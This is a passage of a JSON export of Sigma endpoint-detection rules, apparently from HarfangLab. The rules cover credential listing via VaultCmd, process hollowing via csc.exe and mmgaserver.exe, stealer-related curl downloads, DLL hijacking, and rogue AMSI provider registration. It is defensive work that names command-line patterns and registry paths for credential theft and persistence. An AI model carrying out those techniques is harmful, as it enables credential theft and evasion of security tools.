"rule_description": "Detects a suspicious attempt to dump credentials in Windows using tools that connect to specific named pipes.\nThese credential materials can be harvested by an administrative user or SYSTEM and used to conduct Lateral Movement or Privilege Escalation.\nIt is recommended to analyze both the transmitting and receiving processes and to look for other suspicious activities on the host.\n",
"rule_creation_date": "2022-07-11",
"rule_modified_date": "2025-01-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ace56597-37bb-4f26-8d50-356464cf6c56",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.084665Z",
"creation_date": "2026-03-23T11:45:34.084667Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.084671Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1055/"
],
"name": "t1055_sacrificial_process_csc.yml",
"content": "title: Csc.exe Sacrificial Process Spawned\nid: ace56597-37bb-4f26-8d50-356464cf6c56\ndescription: |\n Detects the suspicious execution of the legitimate Windows binary csc.exe, spawned without arguments and in an abnormal execution context.\n This can mean that the binary is being used as a sacrificial or hollowed process.\n Such processes are spawned and malicious code is immediately injected into them for nefarious purposes.\n This technique is used, for instance, by the Vidar malware.\n It is recommended to investigate the parent process performing this action and the destination IP address of the csc.exe process to determine the legitimacy of this behavior.\nreferences:\n - https://attack.mitre.org/techniques/T1055/\ndate: 2024/05/13\nmodified: 2025/01/27\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.privilege_escalation\n - attack.t1055\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ProcessTampering\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n CommandLine: '?:\\Windows\\Microsoft.NET\\Framework\\v*\\csc.exe'\n filter_ngen:\n CommandLine: '?:\\WINDOWS\\Microsoft.NET\\Framework\\v*\\ngen.exe * *\\csc.exe'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ace56597-37bb-4f26-8d50-356464cf6c56",
"rule_name": "Csc.exe Sacrificial Process Spawned",
"rule_description": "Detects the suspicious execution of the legitimate Windows binary csc.exe, spawned without arguments and in an abnormal execution context.\nThis can mean that the binary is being used as a sacrificial or hollowed process.\nSuch processes are spawned and malicious code is immediately injected into them for nefarious purposes.\nThis technique is used, for instance, by the Vidar malware.\nIt is recommended to investigate the parent process performing this action and the destination IP address of the csc.exe process to determine the legitimacy of this behavior.\n",
"rule_creation_date": "2024-05-13",
"rule_modified_date": "2025-01-27",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1055"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "acf3147a-d635-482b-a2bc-e980842482cd",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.623936Z",
"creation_date": "2026-03-23T11:45:34.623939Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.623943Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1105/",
"https://attack.mitre.org/techniques/T1071/001/"
],
"name": "t1189_stealer_curl_url.yml",
"content": "title: File Downloaded via cURL Related to Stealer Activity\nid: acf3147a-d635-482b-a2bc-e980842482cd\ndescription: |\n Detects the usage of cURL to download a file from a suspicious URL.\n Attackers use this technique to deliver and execute malicious payloads through a fake installer campaign.\n It is recommended to analyze the downloaded file to determine whether its content is malicious.\nreferences:\n - https://attack.mitre.org/techniques/T1105/\n - https://attack.mitre.org/techniques/T1071/001/\ndate: 2026/03/18\nmodified: 2026/03/19\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.t1189\n - attack.command_and_control\n - attack.t1105\n - attack.t1071.001\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.LOLBin.Curl\n - classification.macOS.Behavior.FileDownload\nlogsource:\n product: macos\n category: process_creation\ndetection:\n selection:\n ProcessImage: '/usr/bin/curl'\n ProcessCommandLine|contains: '/curl/'\n\n exclusion_homebrew:\n ProcessCommandLine|contains: 'https://ghcr.io/v2/homebrew/core/curl/'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "acf3147a-d635-482b-a2bc-e980842482cd",
"rule_name": "File Downloaded via cURL Related to Stealer Activity",
"rule_description": "Detects the usage of cURL to download a file from a suspicious URL.\nAttackers use this technique to deliver and execute malicious payloads through a fake installer campaign.\nIt is recommended to analyze the downloaded file to determine whether its content is malicious.\n",
"rule_creation_date": "2026-03-18",
"rule_modified_date": "2026-03-19",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.initial_access"
],
"rule_technique_tags": [
"attack.t1071.001",
"attack.t1105",
"attack.t1189"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ad530185-1f9d-422a-bb74-7bdcda199b74",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.078089Z",
"creation_date": "2026-03-23T11:45:34.078091Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.078096Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://web.archive.org/web/20201004080456/https://rastamouse.me/blog/rdp-jump-boxes/",
"https://attack.mitre.org/techniques/T1003/"
],
"name": "t1003_credentials_listing_using_vaultcmd.yml",
"content": "title: Credentials Listed via Vaultcmd\nid: ad530185-1f9d-422a-bb74-7bdcda199b74\ndescription: |\n Detects the execution of VaultCmd to list credentials from the Windows Credential Manager.\n Attackers can use this technique to find credentials to dump for future credential access.\n It is recommended to investigate the parent process for suspicious activities.\nreferences:\n - https://web.archive.org/web/20201004080456/https://rastamouse.me/blog/rdp-jump-boxes/\n - https://attack.mitre.org/techniques/T1003/\ndate: 2022/11/17\nmodified: 2025/02/19\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003\n - attack.t1555.004\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.SensitiveInformation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - OriginalFileName: 'vaultcmd.exe'\n - Image|endswith: '\\vaultcmd.exe'\n\n selection_action:\n CommandLine|contains:\n - ' -list'\n - ' /list'\n\n condition: all of selection_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ad530185-1f9d-422a-bb74-7bdcda199b74",
"rule_name": "Credentials Listed via Vaultcmd",
"rule_description": "Detects the execution of VaultCmd to list credentials from the Windows Credential Manager.\nAttackers can use this technique to find credentials to dump for future credential access.\nIt is recommended to investigate the parent process for suspicious activities.\n",
"rule_creation_date": "2022-11-17",
"rule_modified_date": "2025-02-19",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003",
"attack.t1555.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ad53570b-a715-454b-bd80-fd165d3958d3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.085226Z",
"creation_date": "2026-03-23T11:45:34.085228Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.085232Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1055/"
],
"name": "t1055_sacrificial_process_mmgaserver.yml",
"content": "title: Mmgaserver.exe Sacrificial Process Spawned\nid: ad53570b-a715-454b-bd80-fd165d3958d3\ndescription: |\n Detects the suspicious execution of the legitimate mmgaserver.exe Windows binary, spawned without arguments and in an abnormal execution context.\n This can mean that the binary is being used as sacrificial or hollowed process.\n Such processes are spawned and malicious code is immediately injected into them for nefarious purposes.\n It is recommended to investigate the parent process performing this action and the destination IP address of the mmgaserver.exe process to determine the legitimacy of this behavior.\nreferences:\n - https://attack.mitre.org/techniques/T1055/\ndate: 2024/05/13\nmodified: 2025/02/12\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.privilege_escalation\n - attack.t1055\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.SacrificialProcess\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n CommandLine:\n - '?:\\WINDOWS\\SysWOW64\\mmgaserver.exe'\n - '?:\\WINDOWS\\System32\\mmgaserver.exe'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ad53570b-a715-454b-bd80-fd165d3958d3",
"rule_name": "Mmgaserver.exe Sacrificial Process Spawned",
"rule_description": "Detects the suspicious execution of the legitimate mmgaserver.exe Windows binary, spawned without arguments and in an abnormal execution context.\nThis can mean that the binary is being used as sacrificial or hollowed process.\nSuch processes are spawned and malicious code is immediately injected into them for nefarious purposes.\nIt is recommended to investigate the parent process performing this action and the destination IP address of the mmgaserver.exe process to determine the legitimacy of this behavior.\n",
"rule_creation_date": "2024-05-13",
"rule_modified_date": "2025-02-12",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1055"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ad688ec6-d5b4-4404-bd3c-dfd831dd35a1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.096270Z",
"creation_date": "2026-03-23T11:45:34.096272Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.096276Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://www.secureworks.com/research/shadowpad-malware-analysis",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_aitstatic.yml",
"content": "title: DLL Hijacking via aitstatic.exe\nid: ad688ec6-d5b4-4404-bd3c-dfd831dd35a1\ndescription: |\n Detects potential Windows DLL Hijacking via aitstatic.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://www.secureworks.com/research/shadowpad-malware-analysis\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'aitstatic.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\mscoree.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\Microsoft.NET\\Framework\\v*\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ad688ec6-d5b4-4404-bd3c-dfd831dd35a1",
"rule_name": "DLL Hijacking via aitstatic.exe",
"rule_description": "Detects potential Windows DLL Hijacking via aitstatic.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ad743e1e-6f61-4a51-9e3f-7568d116265e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.589999Z",
"creation_date": "2026-03-23T11:45:34.590003Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.590011Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_cloudnotifications.yml",
"content": "title: DLL Hijacking via CloudNotifications.exe\nid: ad743e1e-6f61-4a51-9e3f-7568d116265e\ndescription: |\n Detects potential Windows DLL Hijacking via CloudNotifications.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'CloudNotifications.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\uianimation.dll'\n - '\\uxtheme.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ad743e1e-6f61-4a51-9e3f-7568d116265e",
"rule_name": "DLL Hijacking via CloudNotifications.exe",
"rule_description": "Detects potential Windows DLL Hijacking via CloudNotifications.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ad7629c3-3ff9-463b-9a5d-e23eedac07fc",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.097409Z",
"creation_date": "2026-03-23T11:45:34.097411Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.097415Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://learn.microsoft.com/en-us/windows/win32/amsi/dev-audience",
"https://b4rtik.github.io/posts/antimalware-scan-interface-provider-for-persistence/",
"https://persistence-info.github.io/Data/amsi.html",
"https://github.com/netbiosX/AMSI-Provider",
"https://attack.mitre.org/techniques/T1112/",
"https://attack.mitre.org/techniques/T1562/001/",
"https://attack.mitre.org/techniques/T1546/"
],
"name": "t1112_amsi_persistence.yml",
"content": "title: AMSI Provider Added in Registry\nid: ad7629c3-3ff9-463b-9a5d-e23eedac07fc\ndescription: |\n Detects the registration of an Antimalware Scan Interface (AMSI) provider in the registry.\n AMSI is a Windows defense mechanism designed to combat fileless malwares.\n Adversaries can register a malicious AMSI provider to run malicious code whenever the AMSI is triggered to achieve persistence and defense evasion.\n AMSI provider registrations must come from security products such as anti-virus or EDR.\n The AMSI DLL path can be find in registry location HKCR\\CLSID\\\\InProcServer32\\(Default).\n It is recommended to ensure the legitimacy of this action by analyzing the DLL pointed to by the registered CLSID in registry or by investigating the process responsible for the registry modification.\nreferences:\n - https://learn.microsoft.com/en-us/windows/win32/amsi/dev-audience\n - https://b4rtik.github.io/posts/antimalware-scan-interface-provider-for-persistence/\n - https://persistence-info.github.io/Data/amsi.html\n - https://github.com/netbiosX/AMSI-Provider\n - https://attack.mitre.org/techniques/T1112/\n - https://attack.mitre.org/techniques/T1562/001/\n - https://attack.mitre.org/techniques/T1546/\ndate: 2022/11/14\nmodified: 2025/11/03\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - attack.persistence\n - attack.t1112\n - attack.t1546\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ImpairDefenses\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: 'SetValue'\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\AMSI\\Providers\\{????????-????-????-????-????????????}\\(Default)'\n\n filter_empty:\n Details:\n - '(Empty)'\n - ''\n\n exclusion_programfiles:\n - ProcessParentImage|startswith:\n - '?:\\Program Files (x86)\\'\n - '?:\\Program Files\\'\n - 
ProcessImage|startswith:\n - '?:\\Program Files (x86)\\'\n - '?:\\Program Files\\'\n - ProcessCommandLine|contains:\n - '?:\\Program Files (x86)\\'\n - '?:\\Program Files\\'\n\n exclusion_defender:\n ProcessImage|endswith: '\\MsMpEng.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Microsoft Windows Publisher'\n - 'Microsoft Windows'\n - 'Microsoft Corporation'\n\n exclusion_defender_unsigned:\n ProcessImage: '?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\\\*\\MsMpEng.exe'\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\AMSI\\Providers\\{2781761E-28E0-4109-99FE-B9D127C57AFE}'\n\n exclusion_cyberreason:\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Cybereason Inc.'\n - 'Cybereason, Inc'\n - 'Cybereason, Inc.'\n\n exclusion_sentinelone:\n ProcessSigned: 'true'\n ProcessSignature: 'SentinelOne, Inc.'\n\n exclusion_bitdefender:\n ProcessSigned: 'true'\n ProcessSignature: 'Bitdefender SRL'\n\n exclusion_panda:\n ProcessSigned: 'true'\n ProcessSignature: 'Panda Security S.L.'\n\n exclusion_eset:\n - ProcessSigned: 'true'\n ProcessSignature: 'ESET, spol. s r.o.'\n - ProcessParentImage|endswith: '\\ekrn.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'ESET, spol. 
s r.o.'\n - ProcessCommandLine|contains: '?:\\Program Files\\ESET\\ESET Security\\'\n\n exclusion_malwarebyte:\n - ProcessSigned: 'true'\n ProcessSignature:\n - 'Malwarebytes Inc.'\n - 'Malwarebytes Inc'\n - ProcessParentImage:\n - '?:\\Program Files\\Malwarebytes Endpoint Agent\\MBCloudEA.exe'\n - '?:\\Program Files\\Malwarebytes Endpoint Agent\\EAPluginHost.exe'\n\n exclusion_trendmicro:\n ProcessParentImage|startswith:\n - '?:\\Program Files\\Trend Micro\\'\n - '?:\\Program Files (x86)\\Trend Micro\\'\n TargetObject:\n - 'HKLM\\SOFTWARE\\Microsoft\\AMSI\\Providers\\{6138A34F-DCA4-48D0-95CC-51E1D8F30B58}'\n - 'HKLM\\SOFTWARE\\Microsoft\\AMSI\\Providers\\{2856EFBF-914D-4EC1-8E69-1259D5823EC1}'\n\n exclusion_fsecure:\n ProcessCommandLine: 'regsvr32.exe /s ?:\\Program Files (x86)\\F-Secure\\\\*\\fsamsi64.dll'\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\AMSI\\Providers\\{567C4BA7-5B5D-4947-92E8-4691CC4C77DD}'\n\n exclusion_mcafee:\n - ProcessSigned: 'true'\n ProcessSignature:\n - 'Musarubra US LLC'\n - 'McAfee, Inc.'\n - ProcessParentImage: '?:\\Program Files\\McAfee\\\\*\\mc-fw-host.exe'\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\AMSI\\Providers\\{08B5D5DE-93CC-4B76-BB44-4C3A00F1E629}'\n - ProcessCommandLine: '?:\\WINDOWS\\system32\\msiexec.exe /V'\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\AMSI\\Providers\\{436D0575-3FCC-49C2-9E9C-5772A341E1D5}'\n - ProcessGrandparentImage:\n - '?:\\Program Files (x86)\\Common Files\\McAfee\\Installer\\McInst.exe'\n - '?:\\Program Files (x86)\\Common Files\\McAfee\\Installer\\\\*\\McInst.exe'\n\n exclusion_avg:\n ProcessSigned: 'true'\n ProcessSignature: 'AVG Technologies USA, LLC'\n\n exclusion_crowdstrike:\n ProcessImage: '?:\\Program Files\\CrowdStrike\\CSFalconService.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows Hardware Compatibility Publisher'\n\n exclusion_vmware:\n ProcessSigned: 'true'\n ProcessSignature: 'Broadcom Inc'\n\n exclusion_kaspersky:\n ProcessSigned: 'true'\n ProcessSignature:\n - 
'Kaspersky Lab'\n - 'Kaspersky Lab JSC'\n\n exclusion_avast:\n ProcessSigned: 'true'\n ProcessSignature: 'Avast Software s.r.o.'\n\n exclusion_sophos:\n ProcessSigned: 'true'\n ProcessSignature: 'Sophos Ltd'\n\n exclusion_checkpoint:\n ProcessGrandparentImage:\n - '?:\\Program Files (x86)\\CheckPoint\\Endpoint Security\\EFR\\EFRService.exe'\n - '?:\\Program Files\\CheckPoint\\Endpoint Security\\EFR\\EFRService.exe'\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\AMSI\\Providers\\{00FACAAE-5213-42C7-9B65-123AE71013A9}'\n\n exclusion_fortinet:\n ProcessCommandLine: '?:\\Windows\\System32\\regsvr32.exe /s ?:\\Program Files\\Fortinet\\FortiClient\\FortiAmsi.dll'\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\AMSI\\Providers\\{2E5D8A62-77F9-4F7B-A90C-2744820139B2}'\n\n exclusion_symantec:\n ProcessSigned: 'true'\n ProcessSignature: 'Symantec Corporation'\n\n exclusion_webroot:\n ProcessSigned: 'true'\n ProcessSignature: 'Webroot Inc.'\n\n exclusion_cylance:\n ProcessParentImage: '?:\\Program Files\\Cylance\\Desktop\\CylanceSvc.exe'\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\AMSI\\Providers\\{053AEAAE-5F1A-4A07-9A75-175AD71D53F8}'\n\n exclusion_gdata:\n ProcessParentImage: '?:\\ProgramData\\G Data\\Setups\\tmp\\setup.exe'\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\AMSI\\Providers\\{575001B9-9064-4049-B30E-D83C678E5E2A}'\n\n exclusion_norton:\n ProcessImage: '?:\\Program Files\\Norton\\Suite\\RegSvr.exe'\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\AMSI\\Providers\\{DC650FC4-FFD8-4C05-B3A5-F7A94D5629CC}'\n\n exclusion_avkproxy:\n ProcessParentImage: '?:\\Program Files (x86)\\G Data\\Setup\\Client\\SetupSVC.exe'\n TargetObject: 